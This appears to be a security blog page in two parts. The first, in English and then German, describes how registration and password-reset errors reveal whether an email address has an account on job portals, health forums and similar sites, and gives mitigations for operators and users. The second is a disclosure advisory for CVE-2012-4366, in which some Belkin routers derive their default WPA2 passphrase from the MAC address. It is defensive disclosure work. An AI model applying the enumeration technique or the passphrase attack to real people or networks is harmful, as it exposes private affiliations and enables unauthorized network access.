Some sites reveal the existence of an email address/username before the registration form is actually submitted, e.g. using Ajax requests to the server. In this case, no confirmation email is sent to the owner of the email address. Some other sites reveal the existence of an email address when the registration form is submitted even if there is another error such as an empty or weak password, a duplicate username or required form fields left blank. In these cases the sites don't send any confirmation email but still reveal the existence of an account for a given email address.

When a confirmation mail is sent, most users will just ignore it since they haven't registered on the site and not take into account that this email may be the result of someone trying to reveal the user's accounts. Even if a user knows about the problem, it may still be impossible to find out who is responsible for the attack.

7. Mitigation for website operators

Website operators can take some technical measures to mitigate the risk for their users. Depending on the nature of the site, it may be necessary to abandon the possibility for users to choose a username, because a given username may already have been taken, which makes the registration fail and thus reveals the existence of that username. For sites which publicly show the chosen names anyway as part of the site functionality (such as forums or dating sites) and where most users choose a pseudonym for the registration, a freely choosable username is obviously unproblematic. For other sites such as job application portals, where confidential treatment of all user data is commonly expected and many users choose their real name as username, it is probably necessary to abandon freely choosable usernames. The site may either create a randomly generated username or just use the user's email address instead of a username for logging in.

The same problem also applies for email addresses. Most sites show an error message (or a hint to use the existing account) when trying to register with an already registered email address. This problem can be solved by requiring the user to verify the email address by clicking on a link sent to the user via email. If the email address is already registered, the site doesn't need to tell the client browser about the existing account. The site may then send a reminder about the existing account instead of a verification link via email. This makes sure that only the owner of the email address can find out whether there is an account for his email address.
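The registration flow suggested above can be sketched in Python as follows. Everything here is hypothetical: accounts, pending and outbox are in-memory stand-ins for a user database and a mail sender, and the /verify URL is made up. The key property is that register() returns the same response to the browser whether or not the address is already known; the difference only shows up in the mailbox of the address owner.

```python
import secrets

accounts = {}  # email -> account data (hypothetical user store)
pending = {}   # verification token -> email
outbox = []    # (recipient, message) pairs, standing in for a real mail sender


def send_mail(to, text):
    outbox.append((to, text))


def register(email):
    """Handle a registration request without revealing whether the email is known."""
    if email in accounts:
        send_mail(email, "You already have an account. Use the password reset if needed.")
    else:
        token = secrets.token_urlsafe(16)
        pending[token] = email
        send_mail(email, f"Confirm your registration: /verify?token={token}")
    return "Please check your inbox to continue."   # identical for both cases


def verify(token):
    """Create the account only when the link from the email is followed."""
    email = pending.pop(token, None)
    if email is None or email in accounts:
        return False
    accounts[email] = {"verified": True}
    return True
```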

The website operator should also make sure that the password reset functionality and changing the email address of an existing account (which an attacker can easily register for this purpose) doesn't reveal to the client browser whether a given email address is already registered at the site.

The measures proposed here may lead to some extra effort, some loss of convenience (no freely choosable username, the requirement to verify the email address) and increased support costs. So there is an obvious trade-off between usability and privacy. For some sites such as job application portals, dating sites or forums about sensitive topics, it is obvious that privacy should have priority over usability and the existence of an account shouldn't be revealed to unauthorized third parties.

8. Mitigation options for users

Users may also protect their privacy by using secret email addresses/aliases for registering sensitive accounts. You can easily register a new account at a freemail provider of your choice for this. However, registering too many email accounts may be problematic, since it requires users to remember all email addresses/passwords and regularly check all the accounts for incoming mails. As an alternative, some email providers such as Hotmail allow setting up a limited number of alias addresses for one account, so that a user can check incoming emails to multiple addresses with a single email account. Many providers also allow appending a plus sign and a random string to the local part of an email address. You can for instance use john.doe+someRandomString@email.provider instead of john.doe@email.provider when submitting a confidential application to a company. Since an attacker only knows the base address (john.doe@email.provider) and can't guess the random string you appended, he can't check whether you have already registered an account. However, you should keep in mind that you will need the full email address used for the registration for doing a password reset. So it may be a good idea to write down the email alias you used for the registration.
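Creating such an alias with an unguessable tag is easy to script. The Python sketch below uses the standard secrets module; plus_alias() is a hypothetical helper name, and the result only works if your provider actually supports plus addressing (some registration forms may also reject the plus sign).

```python
import secrets


def plus_alias(address, nbytes=6):
    """Return address with a random '+tag' inserted before the @ sign."""
    local, sep, domain = address.rpartition("@")
    if not sep or not local:
        raise ValueError("not an email address: " + address)
    return f"{local}+{secrets.token_hex(nbytes)}@{domain}"


alias = plus_alias("john.doe@email.provider")
# e.g. john.doe+<12 random hex digits>@email.provider; note it down for password resets
```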

If you have already registered at a sensitive site with a non-secret email address, you can still change your email address to an alias. Most sites allow changing the email address in the profile settings. However, some sites still block the registration of a new account with the same email address thus revealing the fact that there had been an account. You may also inform the website operator if a site you know/are using is affected by the problem and the existence of an account should be kept strictly confidential based on the nature of the website.

If you want to hide the existence of an account, you should also choose a username which is non-guessable even for someone who knows you. This is obvious for community sites such as forums or dating sites with publicly visible nicknames. However, even for sites such as job application portals where you expect your data to be treated confidential, you should still choose a non-guessable username.

Information leak in many websites and online job application portals


1. Zusammenfassung

Für die Nutzung vieler Webseiten wie z.B. Foren, Partnerbörsen, Bewerbungsportalen, Newslettern oder sozialen Netzwerken muss man sich als Benutzer registrieren. Für diese Registrierung ist in der Regel die Angabe einer Mailadresse sowie eines frei wählbaren Pseudonyms als Benutzername erforderlich. Die meisten Internetnutzer gehen dabei davon aus, dass lediglich das Pseudonym öffentlich sichtbar ist und die Mailadresse vom Betreiber der Seite vertraulich behandelt wird. Je nach Art der Seite sollte bereits die Existenz eines Accounts zu einer bestimmten Person/Mailadresse geheimgehalten werden, weil bereits die Existenz eines Accounts gewisse Rückschlüsse über den Accountinhaber zulässt. Eine Registrierung in einem Forum zu einer bestimmten Krankheit lässt beispielsweise den Schluss zu, dass der Accountinhaber an dieser Krankheit leidet. Durch das hier vorgestellte Problem können unbefugte Dritte bei vielen Webseiten einfach feststellen, ob zu einer bestimmten Mailadresse ein Account existiert. Im Falle eines Bewerbungsportals bedeutet die Existenz eines Accounts in der Regel, dass der Accountinhaber sich bei der Firma beworben hat. Damit kann ein Arbeitgeber herausfinden, dass sich einer seiner Mitarbeiter bei einer anderen Firma bewirbt.

2. Beschreibung des Problems

Das Problem besteht darin, dass man beim Registrieren eines Accounts eine entsprechende Fehlermeldung bekommt, wenn bereits ein Account mit der angegebenen Mailadresse oder dem gewählten Benutzernamen existiert. Ein unbefugter Dritter kann damit durch den Versuch einer Registrierung mit der Mailadresse oder dem Benutzernamen des potentiellen Accountinhabers feststellen, ob eine Mailadresse oder ein Benutzername bereits auf einer Seite registriert ist.

Die Mailadresse ist fest einer Person zugeordnet und somit kann man aus der Existenz eines Accounts zu einer Mailadresse schließen, dass der Besitzer der Mailadresse sich auf der Seite registriert hat. Ein Arbeitgeber kennt in der Regel zumindest eine private Mailadresse des Mitarbeiters und kann somit feststellen, ob sich der Mitarbeiter mit dieser Mailadresse im Bewerbungsportal einer anderen Firma registriert hat. Man kann über dieses Problem zwar keine Details über den Account wie z.B. das verwendete Pseudonym zu einer Mailadresse oder das abgeschickte Bewerbungsschreiben herausfinden. Allerdings kann allein das Offenbaren der Existenz eines Accounts im Bewerbungsportal einer konkurrierenden Firma unerwünschte Konsequenzen für das bestehende Arbeitsverhältnis des Bewerbers haben.

Für einige Seiten wie z.B. Bewerbungsportale kann der Benutzername in vielen Fällen ebenfalls fest einer bestimmten Person zugeordnet werden (insbesondere bei seltenen Namen und/oder kleinen Branchen), da viele Nutzer dort einen vorhersehbaren Namen wie z.B. "Vorname.Nachname" oder ein dem bisherigen Arbeitgeber bekanntes Pseudonym wählen und auf eine vertrauliche Behandlung der Daten vertrauen.

Some websites do without a separate username and use only the email address and password for login. On other sites, the system assigns a random username. On most of these sites, too, an attempted new registration reveals whether a particular email address is already registered.

3. Prevalence of the problem among job application portals

I tested the job application portals of several large companies by attempting a duplicate registration with the same username or the same email address. Of the 30 companies in the DAX stock index, 27 are affected by the problem. The remaining 3 companies either do not operate an application portal or only accept direct applications without prior registration of an account. I therefore assume that the vast majority of companies operating an online application portal are affected. The application portals of many international corporations such as IBM or Intel are affected as well.

4. Other problematic online accounts

The problem occurs not only with job application portals but also with various other websites such as online shops, forums, newsletters, social networks or dating sites. In some cases, the mere existence of an account in a forum already allows problematic conclusions about the account holder. For example, instead of asking the prohibited question about pregnancy, an employer could check whether a female applicant is registered in a pregnancy forum with the email address she used for her application, and then reject her under some pretext. Likewise, a registration in a forum on a sensitive topic such as employee rights, homosexuality, particular political or ideological views or activities, diseases (e.g. HIV) or mental health problems should not be visible to everyone. Most users assume that the forum operator treats the email address confidentially and that only a freely chosen pseudonym is publicly visible. It can therefore be highly problematic if anyone who knows the email address can determine membership in such a forum.

5. Possible abuse by cybercriminals

The existence of an account in a forum or support portal for specific hardware or software components can reveal to an attacker that a user uses that hardware or software. The attacker can then specifically target security vulnerabilities in these components.

Cybercriminals could use the problem to make their attacks more effective. For example, they can send phishing emails only to the addresses that are actually registered on the respective site. When trying to take over an account by guessing the password (or the answer to the security question used for resetting the password), it can also be useful for an attacker to first check whether an account actually exists for a particular username or email address.

6. Confirmation emails

Some sites send a confirmation email to the specified address when someone attempts to register. From this confirmation email, the user can tell that someone has tried to register with the user's email address.

Some sites indicate (e.g. via an Ajax request to the server) whether an email address or username is already registered even before the registration form is submitted. In this case, no confirmation email is sent to the owner of the email address. Other sites report that the email address is already in use after the registration form is submitted, even if the registration fails anyway for other reasons such as a missing password, a username that is already taken or required fields left blank. In this case, too, no confirmation email is sent, yet an attacker can still determine whether an email address is registered on the site.

Even when a confirmation email is sent, most users ignore it, since they did not register themselves and it does not occur to them that someone might be using their email address to look for their online accounts. And even if a user is aware of the problem, it may be difficult or impossible to identify who is responsible for the attack.

7. Possible solutions for site operators

Technically, the problem can be solved by adapting the affected websites. Depending on the kind of site, this may require dropping freely chosen usernames, because a chosen username may already be taken, which inevitably leads to an error message when someone tries to register a new account with the same username. On sites where the chosen username or nickname is publicly visible anyway (e.g. forums or dating sites) and most users register with a pseudonym, this is of course not a problem. On other sites, such as job application portals, where confidential treatment of data is generally expected and many users register with their real name rather than a pseudonym, dropping freely chosen usernames is probably necessary. Instead, the site can either assign a random username or do without usernames entirely and use the email address as the login name.

The same problem also occurs with the email address. If you try to register again with an email address that is already registered, most websites likewise show an error message or ask you to log in with the existing account. One solution is to verify the email address via a confirmation link. If the email address is already registered, the site can omit the error message to the requesting web browser and send a reminder about the existing account instead of the confirmation email. This way, only the owner of the email address can find out whether an account already exists for that address.
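The confirmation-link approach can be sketched as follows. This is a minimal, hypothetical Python illustration, not code from any particular portal: the `Site` class, its in-memory `accounts`/`pending` dictionaries and the `outbox` list stand in for a real user database and mail queue, and the random `user-xxxxxxxx` username reflects the option of assigning random usernames mentioned above.

```python
import secrets
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple


@dataclass
class Site:
    # Hypothetical in-memory stand-ins for a user table and an outgoing mail queue.
    accounts: Dict[str, str] = field(default_factory=dict)       # email -> username
    pending: Dict[str, str] = field(default_factory=dict)        # token -> email
    outbox: List[Tuple[str, str]] = field(default_factory=list)  # (recipient, message)

    def register(self, email: str) -> str:
        """Start a registration without revealing whether `email` is already registered."""
        if email in self.accounts:
            # Existing account: remind the address owner instead of showing an error.
            self.outbox.append((email, "Reminder: an account already exists for this address."))
        else:
            # New address: send a confirmation link; the account is created only in confirm().
            token = secrets.token_urlsafe(16)
            self.pending[token] = email
            self.outbox.append((email, f"Confirm your registration: /confirm?token={token}"))
        # Identical response in both branches, so the requesting browser learns nothing.
        return "Please check your mailbox to continue."

    def confirm(self, token: str) -> Optional[str]:
        """Create the account once the address owner clicks the link; returns the username."""
        email = self.pending.pop(token, None)
        if email is None or email in self.accounts:
            return None
        # Random username instead of a freely chosen one.
        username = "user-" + secrets.token_hex(4)
        self.accounts[email] = username
        return username
```

Both branches of `register` return the same text. A real deployment should also avoid observable differences in response time between the two branches, for example by sending mail from a background queue.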

The "reset password" function and the function for changing the email address of an existing account (which an attacker can easily register for this purpose) must likewise ensure that the site's behavior does not reveal whether a particular email address is registered.
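Applied to password reset and email change, the same principle might look like the following minimal sketch. `AccountService`, its in-memory stores and the message texts are hypothetical; the requester of an email change is assumed to be already logged in as the owner of `current_email`.

```python
import secrets
from dataclasses import dataclass, field
from typing import Dict, List, Tuple


@dataclass
class AccountService:
    # Hypothetical in-memory stores; a real site would use its database and mail queue.
    accounts: Dict[str, str] = field(default_factory=dict)                      # email -> username
    pending_changes: Dict[str, Tuple[str, str]] = field(default_factory=dict)  # token -> (old, new)
    outbox: List[Tuple[str, str]] = field(default_factory=list)                # (recipient, message)

    def request_password_reset(self, email: str) -> str:
        if email in self.accounts:
            token = secrets.token_urlsafe(16)
            self.outbox.append((email, f"Reset your password: /reset?token={token}"))
        # Same answer whether or not the address is registered.
        return "If this address is registered, a reset link has been sent to it."

    def request_email_change(self, current_email: str, new_email: str) -> str:
        if new_email in self.accounts:
            # Do not reject the change visibly; inform the owner of new_email instead.
            self.outbox.append((new_email, "Someone tried to add this address to another account."))
        else:
            token = secrets.token_urlsafe(16)
            self.pending_changes[token] = (current_email, new_email)
            self.outbox.append((new_email, f"Confirm your new address: /confirm-email?token={token}"))
        # Same answer in both branches.
        return "Please confirm the change via the link sent to the new address."
```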

However, the measures proposed here require some additional effort and may reduce convenience (no self-chosen username, verification link for the email address) as well as increase support effort. There is thus a certain conflict between usability and privacy. For some sites, however, such as job application portals, dating sites or forums on certain topics, it is obvious that the users' privacy must be protected and that the site should not reveal the existence of accounts to unauthorized third parties.

8. Protection options for users

Users can also protect their privacy by taking certain measures. For example, one can create a new email address with a free email provider for registering sensitive accounts. However, creating and managing many email accounts is cumbersome, because you have to remember all the addresses and passwords and regularly check incoming mail on all of them. As an alternative, some email providers such as Hotmail allow creating a limited number of alias addresses for an account, so that a single account can be used with several email addresses. In addition, many providers allow inserting a "+" followed by an additional string before the @ sign of the address. For example, you can register an account using the address john.doe+someRandomString@email.provider instead of john.doe@email.provider. Since an attacker only knows the base address (john.doe@email.provider) and not the random string, the attacker cannot determine whether the user has registered an account. However, keep in mind when creating the account that a password reset may later require the full email address used for registration. It is therefore advisable to write down the email address used when registering an account.
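Assuming the provider supports "+" subaddressing (not all do, and some registration forms reject "+" characters), a hard-to-guess tag can be generated like this. The function name `tagged_address` and the 12-hex-digit tag length are arbitrary choices for illustration.

```python
import secrets


def tagged_address(base: str, nbytes: int = 6) -> str:
    """Return `base` with a random '+tag' inserted before the '@' sign."""
    local, sep, domain = base.rpartition("@")
    if not sep or not local or not domain:
        raise ValueError(f"not an email address: {base!r}")
    tag = secrets.token_hex(nbytes)  # 2 * nbytes random hex characters
    return f"{local}+{tag}@{domain}"


addr = tagged_address("john.doe@email.provider")
print(addr)  # e.g. john.doe+<12 random hex digits>@email.provider; write this down
```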

If you have already registered a sensitive account with a non-secret email address, many sites allow you to change the email address in the profile settings afterwards or to delete the account, thereby hiding its existence. However, some sites keep blocking new registrations with the old email address even after it has been changed, thus revealing that an account with that address exists or has existed.

Users can also notify the operators of affected sites if, given the nature or topic of the site, the existence of an account should definitely remain confidential.

If you want to hide the existence of an account, you should of course choose a username that cannot easily be guessed (even by acquaintances or your employer). This is obvious for sites with publicly visible usernames or nicknames (e.g. forums or dating sites). Because of the problem described here, however, you should also use an unguessable username on sites such as job application portals, where you expect your data to be treated confidentially.

CVE-2012-4366: Insecure default WPA2 passphrase in multiple Belkin wireless routers

I. Background

Belkin ships many wireless routers with an encrypted wireless network configured by default. The network name (ESSID) and the (seemingly random) password are printed on a label on the bottom of the device.

II. Description of vulnerability

Having a preconfigured, randomly generated WPA2-PSK passphrase for wireless routers is basically a good idea, since a vendor-generated passphrase can be much more secure than most user-generated passwords. However, in the case of Belkin the default password is calculated solely from the MAC address of the device. Since the MAC address is broadcast in the beacon frames sent out by the device, a wireless attacker can calculate the default passphrase and then connect to the wireless network.

Each of the eight characters of the default passphrase is created by substituting a corresponding hex digit of the WAN MAC address using a static substitution table. Since the WAN MAC address equals the WLAN MAC address plus one or two (depending on the model), a wireless attacker can easily guess the WAN MAC address of the device and thus calculate the default WPA2 passphrase.
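The two steps described above, deriving the WAN MAC from the broadcast WLAN MAC and substituting hex digits through a static table, can be sketched in Python. The actual Belkin substitution table and digit order are not reproduced in this advisory, so the sketch takes them as parameters (`positions`, `table`); any values passed in are placeholders, not the real ones. It also assumes that the +1/+2 offset is added to the full 48-bit address with carry.

```python
from typing import List, Mapping, Sequence


def wan_mac_candidates(wlan_mac: str, offsets: Sequence[int] = (1, 2)) -> List[str]:
    """WAN MAC candidates: the broadcast WLAN MAC (BSSID) plus 1 or 2, as 12 hex digits."""
    value = int(wlan_mac.replace(":", "").replace("-", ""), 16)
    # Assumption: the offset is added to the whole 48-bit address, with carry.
    return [f"{(value + k) % (1 << 48):012x}" for k in offsets]


def substitute(wan_mac_hex: str, positions: Sequence[int], table: Mapping[str, str]) -> str:
    """Map the hex digits at `positions` of the WAN MAC through a static `table`.

    `positions` and `table` are placeholders: the real Belkin values are not given here.
    """
    return "".join(table[wan_mac_hex[p]] for p in positions)
```

Each WAN MAC candidate yields exactly one candidate passphrase, so an attacker has at most two guesses to try per device.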

Moreover, the default WPA2-PSK passphrase consists solely of 8 hexadecimal digits, which limits the entropy to only 32 bits (or 33 bits, since some models use uppercase hex digits). After sniffing one successful association of a client with the wireless network, an attacker can carry out an offline brute-force attack to crack the password. The program oclHashcat-plus can try 131,000 passwords per second on one high-end GPU (AMD Radeon HD 7970) [1]. At this rate, a full search of the 32-bit key space takes about 9 hours.
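The 9-hour figure follows directly from the key space size and the quoted cracking rate; a short check:

```python
KEYSPACE_BITS = 32   # 8 hex digits x 4 bits per digit
RATE = 131_000       # WPA2-PSK guesses per second on one HD 7970, as quoted above


def full_search_hours(bits: int = KEYSPACE_BITS, rate: float = RATE) -> float:
    """Time in hours to try every key in a 2**bits key space at `rate` guesses/second."""
    return 2 ** bits / rate / 3600


print(f"{full_search_hours():.1f}")    # prints 9.1  (32 bits)
print(f"{full_search_hours(33):.1f}")  # prints 18.2 (33 bits, letter case unknown)
```

On average the key is found after searching half of the key space, i.e. after about 4.6 hours in the 32-bit case.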

III. Impact

An attacker can exploit this vulnerability to calculate the WPA2-PSK passphrase of a wireless network. This allows sniffing and decrypting all wireless traffic in a purely passive attack given that the attacker has also sniffed the association.

The attacker may also connect to the wireless network, which may allow further exploitation of unprotected systems in the local network. An attacker may furthermore use the wireless network to access the internet from the owner's network. The network owner may then be held responsible for any illegal activities perpetrated by the unauthorized users.

IV. Affected devices

Belkin Surf N150 Model F7D1301v1

The official Belkin support page [2] contains pictures of the label of several other WiFi devices, which show that the following devices are vulnerable as well:

Belkin N900 Model F9K1104v1
Belkin N450 Model F9K1105V2

The following device uses a variation of the algorithm, and its password consists of uppercase hex digits. When our algorithm is applied to the WLAN MAC address of the device, the first 5 digits of the password are calculated correctly. It is likely that the algorithm differs only in the substitution tables used.

Belkin N300 Model F7D2301v1

It is likely that other Belkin devices are affected as well. Unfortunately, Belkin has not yet cooperated with us to fix the vulnerability and/or confirm a list of other affected devices. If you own a Belkin wireless router and want to know whether it is vulnerable as well, you should change the passphrase and then send me the relevant data (model number, WAN/WLAN MAC address and the original default WPA2 passphrase).

V. Solution

Users of potentially affected wireless routers should change the wireless passphrase to something more secure.

VI. Timeline

6.1.2012: Vendor contacted
27.1.2012: Escalated
29.10.2012: Another contact attempt, still no response
19.11.2012: Public disclosure

VII. Credits

Jakob Lell
Jörg Schneider

VIII. References

Advisory location: http://www.jakoblell.com/blog/?p=15

CVE-2012-4366

[1] http://hashcat.net/oclhashcat-plus/
[2] http://en-us-support.belkin.com/app/answers/detail/a_id/6989